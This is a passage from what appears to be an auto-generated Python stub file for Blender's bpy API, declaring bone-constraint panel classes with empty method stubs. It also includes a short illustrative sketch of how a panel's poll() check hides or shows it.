def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
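# Each BONE_PT_* panel is shown only when poll() finds a matching active
# constraint via get_constraint(). A hedged sketch of that gating pattern,
# using stand-in context/constraint classes rather than real bpy types:

```python
class FakeConstraint:
    # Illustrative substitute for a bpy constraint with a .type enum string.
    def __init__(self, type_):
        self.type = type_


class FakeContext:
    # Illustrative substitute for bpy.context carrying the active constraint.
    def __init__(self, constraint):
        self.constraint = constraint


class DampTrackPanelSketch:
    # Hypothetical analogue of BONE_PT_bDampTrackConstraint: the panel
    # declares which constraint type it draws, and poll() hides it otherwise.
    constraint_type = 'DAMPED_TRACK'

    @classmethod
    def poll(cls, context):
        con = context.constraint
        return con is not None and con.type == cls.constraint_type
```

# Blender's UI calls poll() before draw(); returning False suppresses the panel.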
class BONE_PT_bDistLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bFollowPathConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bFollowTrackConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bKinematicConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bLocLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bLocateLikeConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bLockTrackConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bMinMaxConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bObjectSolverConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bPivotConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
